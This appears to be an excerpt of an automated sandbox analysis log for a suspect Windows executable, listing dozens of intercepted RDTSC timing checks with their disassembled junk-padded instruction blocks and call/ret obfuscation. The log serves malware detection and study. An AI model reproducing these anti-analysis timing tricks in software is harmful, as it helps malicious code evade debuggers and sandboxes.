                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5408 second address: 4B5489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [ebp+122D3291h], ecx 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F95D47CFB28h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D184Ah], ebx 0x00000030 push 00000000h 0x00000032 push 00000003h 0x00000034 pushad 0x00000035 mov edx, dword ptr [ebp+122D2C14h] 0x0000003b mov esi, 476C8DFCh 0x00000040 popad 0x00000041 call 00007F95D47CFB29h 0x00000046 pushad 0x00000047 jmp 00007F95D47CFB38h 0x0000004c push ebx 0x0000004d jo 00007F95D47CFB26h 0x00000053 pop ebx 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 push esi 0x00000058 push edx 0x00000059 pop edx 0x0000005a pop esi 0x0000005b pop edx 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5489 second address: 4B54AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F95D526962Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B573A second address: 4B5747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F95D47CFB26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5747 second address: 4B5789 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F95D5269634h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jl 00007F95D5269633h 0x0000001b jmp 00007F95D526962Dh 0x00000020 mov eax, dword ptr [eax] 0x00000022 jo 00007F95D526962Eh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5789 second address: 4B57F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F95D47CFB34h 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2848h], edx 0x00000015 push 00000003h 0x00000017 xor dword ptr [ebp+122D184Ah], esi 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D19FAh], ecx 0x00000025 push 00000003h 0x00000027 mov ecx, 37AE1749h 0x0000002c call 00007F95D47CFB29h 0x00000031 jns 00007F95D47CFB34h 0x00000037 push eax 0x00000038 jne 00007F95D47CFB2Eh 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 push edi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B57F9 second address: 4B5839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F95D5269637h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F95D5269630h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70D9 second address: 4D70FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D47CFB2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007F95D47CFB26h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F95D47CFB26h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D414 second address: 49D41E instructions: 0x00000000 rdtsc 0x00000002 js 00007F95D526963Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D41E second address: 49D43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB31h 0x00000009 jp 00007F95D47CFB2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D51BB second address: 4D51C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5497 second address: 4D549C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D55B9 second address: 4D55BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D56D4 second address: 4D56E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F95D47CFB2Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D56E7 second address: 4D571A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F95D5269626h 0x0000000b pop ecx 0x0000000c jmp 00007F95D5269634h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95D526962Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D571A second address: 4D571E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D571E second address: 4D5736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5736 second address: 4D5765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB35h 0x00000007 je 00007F95D47CFB26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F95D47CFB26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5765 second address: 4D5769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D58BE second address: 4D58C8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D47CFB26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D58C8 second address: 4D58DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F95D5269626h 0x0000000d jbe 00007F95D5269626h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDE7F second address: 4CDEA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F95D47CFB39h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEA1 second address: 4CDEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEA7 second address: 4CDEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEB3 second address: 4CDEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEB9 second address: 4CDEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEBE second address: 4CDEC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEC3 second address: 4CDEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F95D47CFB32h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEDC second address: 4CDEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7704 second address: 4A770D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6284 second address: 4D62A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F95D526962Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F95D5269626h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62A2 second address: 4D62BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F95D47CFB28h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62BC second address: 4D62D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269630h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62D1 second address: 4D62D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62D9 second address: 4D62DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62DD second address: 4D62FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB30h 0x00000007 je 00007F95D47CFB26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69B4 second address: 4D69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269635h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69CF second address: 4D69D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69D4 second address: 4D69DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D526962Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69DE second address: 4D69F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F95D47CFB2Ah 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69F4 second address: 4D69FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6CB5 second address: 4D6CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB33h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F95D47CFB26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2DCE second address: 4E2DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Eh 0x00000007 jmp 00007F95D5269635h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2DF5 second address: 4E2E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F95D47CFB26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2E01 second address: 4E2E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FA7 second address: 4E2FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FB1 second address: 4E2FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F95D5269633h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FD1 second address: 4E2FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FEB second address: 4E3001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269632h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3152 second address: 4E315C instructions: 0x00000000 rdtsc 0x00000002 je 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3564 second address: 4E357F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F95D5269632h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E36E8 second address: 4E3705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F95D47CFB36h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3705 second address: 4E3726 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F95D526962Ah 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a jg 00007F95D5269626h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F95D5269636h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3886 second address: 4E38A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB37h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E38A6 second address: 4E38B2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95D5269626h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6CF8 second address: 4E6CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6D7A second address: 4E6DBB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6C83E1DCh 0x00000011 mov si, B810h 0x00000015 call 00007F95D5269629h 0x0000001a jg 00007F95D526963Eh 0x00000020 push eax 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6DBB second address: 4E6E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB2Ah 0x00000009 popad 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F95D47CFB39h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F95D47CFB36h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7084 second address: 4E7089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E710E second address: 4E7112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7112 second address: 4E712B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E78C7 second address: 4E78EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F95D47CFB2Dh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F95D47CFB28h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7A42 second address: 4E7A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7B1F second address: 4E7B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7D17 second address: 4E7D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7F39 second address: 4E7F57 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D47CFB34h 0x00000008 jmp 00007F95D47CFB2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7F57 second address: 4E7F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EAB16 second address: 4EAB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F95D47CFB26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA86A second address: 4EA874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA874 second address: 4EA878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB486 second address: 4EB48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB48A second address: 4EB490 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBF6C second address: 4EBF72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBC81 second address: 4EBC8B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBF72 second address: 4EBF85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F95D5269626h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBC8B second address: 4EBCA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F95D47CFB2Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED449 second address: 4ED46B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269636h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F95D5269626h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2343 second address: 4F23B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F95D47CFB28h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 stc 0x00000023 or edi, 77B9C9B2h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2803h], edi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F95D47CFB28h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d jmp 00007F95D47CFB2Bh 0x00000052 mov bx, si 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b pop edi 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F23B3 second address: 4F23CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269633h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDD60 second address: 4EDD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF1F9 second address: 4EF2A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F95D5269628h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1245F84Dh], ecx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 xor ebx, dword ptr [ebp+122D3357h] 0x0000003e mov eax, dword ptr [ebp+122D1461h] 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F95D5269628h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000014h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e jbe 00007F95D526962Bh 0x00000064 add di, A298h 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007F95D5269638h 0x00000070 jmp 00007F95D526962Eh 0x00000075 nop 0x00000076 jnp 00007F95D5269638h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F23CA second address: 4F23CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDD67 second address: 4EDD71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F95D5269626h 0x0000000a rdtsc
